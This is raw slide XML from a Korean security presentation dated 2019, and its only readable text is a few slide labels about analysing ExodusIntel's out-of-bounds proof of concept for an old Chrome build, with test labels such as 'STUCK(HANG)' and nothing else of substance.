                <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>https://powerhacker.net/forum/security-research/341-all-about-how-to-build-an-old-chrome-browser-for-each-platform</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="700">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="그림 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D175A647-856E-4F92-9A41-51EE7FBF460C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9194672" y="3460357"/>
            <a:ext cx="2613551" cy="2896166"/>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9" name="슬라이드 번호 개체 틀 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{581B2D6A-7773-4D7D-9D58-0060646DE5B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F3ECD9F8-CFA2-4FC9-86A0-B66D202A3856}" type="slidenum">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>7</a:t>
            </a:fld>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>/23</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="날짜 개체 틀 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{722E584F-A1B9-4BBC-A4BF-74BD026DCC90}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{CD8251DC-B107-4744-A17D-8CE94334F2EB}" type="datetime1">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>2019-11-28</a:t>
            </a:fld>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1641831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962403-B5F4-4A33-9B04-6662D25D9260}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="611942" y="129722"/>
            <a:ext cx="3943331"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ExodusIntel’s PoC Analysis</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2400">
              <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
            </a:endParaRP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7" y="866181"/>
            <a:ext cx="7231332" cy="52322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a:t>I assume you already know the technology for OOB.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>If you don't know, simply read this document and read it later after studying OOB.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="그림 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D412829D-94D0-4DFD-B1E5-26F309ACC4C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="380176" y="1389401"/>
            <a:ext cx="5244736" cy="3014021"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="그림 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10E66E73-8C16-4149-998D-5C8F3249C9F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3348406" y="1700537"/>
            <a:ext cx="3588570" cy="3537948"/>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9" name="사각형: 둥근 모서리 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8F57F32-8ED0-48A2-A13B-72DDFF3476D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3719078" y="1954667"/>
            <a:ext cx="507676" cy="4597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CBDB4A5F-2A6E-4B92-83A9-B0CEE2B735D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="9" idx="3"/>
            <a:endCxn id="6" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4226754" y="2082603"/>
            <a:ext cx="3368650" cy="101941"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 89477"/>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21A16D1E-C45C-4155-BFB0-858E160E8944}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="9" idx="1"/>
            <a:endCxn id="33" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1" flipV="1">
            <a:off x="3719078" y="2184543"/>
            <a:ext cx="1284528" cy="1170279"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -7010"/>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9F92DBDD-CF3E-4FD9-B101-380A55081D3A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="33" idx="3"/>
            <a:endCxn id="17" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7069661" y="3354823"/>
            <a:ext cx="525743" cy="589970"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 48960"/>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3" name="그림 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B934A804-7EB5-4766-83B0-0BF719458CAA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5003606" y="3087101"/>
            <a:ext cx="2066055" cy="535444"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="76" name="그룹 75">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA16C0AB-8EB9-41D8-8C03-920A98BE3462}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7595404" y="1669719"/>
            <a:ext cx="4216420" cy="825768"/>
            <a:chOff x="7595404" y="3296493"/>
            <a:chExt cx="4216420" cy="825768"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="6" name="그림 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D0BF7F2-DB2D-4D9B-A371-73C0CC68A828}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId7"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="7595404" y="3296493"/>
              <a:ext cx="4216420" cy="825768"/>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16" name="TextBox 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1B1AEF9-2D28-4F12-B299-D749C9F3834F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9099859" y="3773473"/>
              <a:ext cx="1207510" cy="276999"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>STUCK(HANG)</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="48" name="직선 연결선 47">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A1B39FB7-CDE9-493B-B100-B53667A372A5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10348236" y="3694053"/>
              <a:ext cx="138571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9" name="그룹 78">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{07831583-1248-4614-BB04-7B7AE1087107}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7595404" y="2804988"/>
            <a:ext cx="4216420" cy="2279609"/>
            <a:chOff x="7595404" y="4226499"/>
            <a:chExt cx="4216420" cy="2279609"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="17" name="그림 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10E7511E-BBF0-4509-BB0D-F303A60D2AE8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId8"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="7595404" y="4226499"/>
              <a:ext cx="4216420" cy="2279609"/>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cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="51" name="직선 연결선 50">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2D3AA3E-9D1C-46BB-9347-A84E7827CB57}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9478960" y="4505434"/>
              <a:ext cx="9523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CAFA6990-9D52-4E23-9E5E-08E72C85D0E2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10661188" y="4684384"/>
              <a:ext cx="812233" cy="91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81F47FBB-FFF6-4C60-B536-71AD6A9DFB31}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8443302" y="4758830"/>
              <a:ext cx="1175778" cy="7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6" name="사각형: 둥근 모서리 85">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE63944A-19F0-434E-B197-40C118929603}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="786691" y="1519239"/>
            <a:ext cx="4766118" cy="112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A30AFD47-39FC-4839-9E51-555E2CA6255D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="788940" y="2310873"/>
            <a:ext cx="1004102" cy="112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연결선: 꺾임 88">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E8F208A-A97C-4559-82B1-91E799410696}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="86" idx="1"/>
            <a:endCxn id="87" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1" flipV="1">
            <a:off x="786690" y="1575652"/>
            <a:ext cx="2249" cy="791634"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -5167452"/>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7EBC70B8-85B9-4DB1-BB10-C8B2ADC2121B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="87" idx="3"/>
            <a:endCxn id="83" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1793042" y="2367286"/>
            <a:ext cx="1555363" cy="3536243"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 84772"/>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45FC9A81-629E-42B4-964B-8028CF6A0214}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7595404" y="1358458"/>
            <a:ext cx="1462003" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>1. The First test</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="152" name="TextBox 151">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FAD3FEFF-145D-4D16-B878-7A3C47B1D43A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7592159" y="2493425"/>
            <a:ext cx="1702454" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>2. The Second test</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="153" name="TextBox 152">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87DFD48A-73A1-4FB3-B370-7D5A27A702CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7592159" y="5084597"/>
            <a:ext cx="1521635" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>3. The Third test</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="170" name="그룹 169">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC744628-95FD-4F6C-A01B-6A9015DCCB46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3348405" y="5398293"/>
            <a:ext cx="3922190" cy="1010471"/>
            <a:chOff x="3348406" y="5357961"/>
            <a:chExt cx="4033204" cy="1066787"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="83" name="그림 82">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{486BC21E-3A33-4576-95BB-C52BA1DEF1B9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId9"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="3348406" y="5357961"/>
              <a:ext cx="4033204" cy="1066787"/>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168" name="사각형: 둥근 모서리 167">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69EFBB55-80AA-4876-A29E-CA296F8E7572}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3655016" y="5459858"/>
              <a:ext cx="3704425" cy="79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9" name="사각형: 둥근 모서리 168">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{367A26A4-4B39-4CDD-BCEC-E86CA49E5724}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3657790" y="6041538"/>
              <a:ext cx="897483" cy="79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73" name="연결선: 꺾임 172">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CEBD4638-955E-4F81-8ED5-F4EBF9586DA9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="83" idx="3"/>
            <a:endCxn id="84" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7270595" y="5665723"/>
            <a:ext cx="321564" cy="237806"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 43064"/>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83" name="그룹 182">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93B3252C-C081-49BA-8FC3-9C074E447204}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7592159" y="5392374"/>
            <a:ext cx="4278126" cy="546698"/>
            <a:chOff x="7592159" y="5392374"/>
            <a:chExt cx="4278126" cy="546698"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="84" name="그림 83">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2BF44C84-2670-45EA-A45D-06E6D19E0194}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId10"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="7592159" y="5392374"/>
              <a:ext cx="4278126" cy="546698"/>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cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="179" name="직선 연결선 178">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83E82FE5-7E89-49DD-9D6E-06B94FB883EB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9502601" y="5682451"/>
              <a:ext cx="9739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직사각형 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5B37904-DBB1-4350-944A-865AC1F4CF94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9568292" y="5667540"/>
            <a:ext cx="2185791" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>OK. At least there is no error.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
